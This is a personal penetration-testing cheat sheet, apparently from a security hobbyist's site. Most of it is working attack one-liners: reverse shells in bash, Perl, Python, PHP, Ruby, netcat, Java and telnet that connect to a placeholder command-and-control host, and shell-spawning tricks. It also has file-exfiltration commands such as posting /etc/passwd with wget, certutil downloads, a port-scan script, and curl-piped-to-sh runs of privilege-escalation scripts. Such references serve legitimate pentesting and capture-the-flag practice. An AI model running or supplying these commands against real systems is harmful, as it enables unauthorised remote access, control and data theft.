N4pst3r

To see the world, things dangerous to come to, to see behind walls, draw closer, to find each other and to feel. That is the purpose of life.

– Life Magazine

Cheatsheet

Simple Cheatsheet useful for me.

Spwan TTY

Spwan a teletypewriter (TTY) aka a shell

Python

python -c 'import pty;pty.spawn("/bin/bash")'
Or
python3 -c 'import pty;pty.spawn("/bin/bash")'

Echo

echo 'os.system('/bin/bash')'

sh

/bin/sh -i

Bash

/bin/bash -i

Perl

perl -e 'exec "/bin/sh";'

From within vi

:!bash
Or
:set shell=/bin/bash:shell

Nmap

nmap --interactive
Then
!sh

LUA

os.execute('/bin/sh')

From within IRB

exec "/bin/sh"

Ruby

exec "/bin/sh"


Reverse Shell

The target machine initiates the connection to the C&C (aka C2, Command&Control), and the C&C listens for incoming connections on a specified port.
Legenda $c2ip = IP Address of the C&C Machine
$c2port = Port which is listening on the C&C Machine

Bash

bash -i >& /dev/tcp/$c2ip/$c2port 0>&1
or
0<&196;exec 196<>/dev/tcp/$c2ip/$c2port; sh <&196 >&196 2>&196

Perl

perl -e 'use Socket;$i="$c2ip";$p=$c2port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
or
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"$c2ip:$c2port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Perl on Windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"$c2ip:$c2port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$c2ip",$c2port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("$c2ip",$c2port);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("$c2ip",$c2port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Or Ruby taht doesn't depend on /bin/sh/
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("$c2ip","$c2port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Or Ruby on Windows
ruby -rsocket -e 'c=TCPSocket.new("$c2ip","$c2port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Netcat

nc -e /bin/sh $c2ip $c2port
Or
nc -c /bin/sh $c2ip $c2port
Or
/bin/sh | nc $c2ip $c2port
Or
rm -f /tmp/p; mknod /tmp/p p && nc $c2ip $c2port 0/tmp/p
Or wrong version of Netcat (?)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $c2ip $c2port >/tmp/f

JAVA

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/$c2ip/$c2port;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Telnet ?!? lolwut ?!?

rm -f /tmp/p; mknod /tmp/p p && telnet $c2ip $c2port 0/tmp/p
Or
telnet $c2ip $c2port | /bin/bash | telnet $c2ip $c2port   # Remember to listen on your machine also on port $c2port/tcp


File Transfers

Linux

Host Files
python -m SimpleHTTPServer 80
Or
python3 -m http.server 80
Or
python -m pyftpdlib -p 21 # FTP
Grab Files
wget http://<ip>:<port>/stuff.txt
Receive Files
nc -nvlp <port> file # redirect into new file
Send Files
NC
nc <ip> <port> < file
wget
wget --post-file=/etc/passwd <ip>:<port>
tail -n +10 file > clean_file # delete transfer data

Windows

Grab Files - HTTP
C:\Users\<user>>certutil -rulcache -f http://<ip>:<port>/secrets.txt secrets.txt
Grab Files - FTP
C:\Users\<user>>ftp 
ftp> get <file>



Cyber Kill Chain

Reconnaissance Phase

reconnaissance.sh
#!/bin/bash
echo Obtaining ports...
ports=$(nmap -p- --min-rate 1000 -T4 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)  
echo Ports obtained!
echo Scanning...
nmap -sC -sV -Pn -p $ports $1 $2 $3
Example
reconnaissance.sh 192.168.1.1 -oX nmap.xml


Linux Privilege Escalation

LinEnum

Linux Enumeration

Usage
curl -L https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh

LinPEAS.sh

Linux Privilege Escalation Awesome Script

Usage
curl -L https://n4pst3r.me/linpeas.sh | sh


Windows Privilege Escalation

WinPEAS.sh

Windows Privilege Escalation Awesome Script

Usage

Downlaod the Github repo

git clone https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

Follow the instructions on how to build your own executable or using the default ones (x64/x86).

Then downlaod WinPeas to the system you want to test, and run it as winpeas.exe



Contacts
Social Link
Social Link
Twitter @LudovicoLoreti
Linkedin @LudovicoLoreti
Github @LudovicoLoreti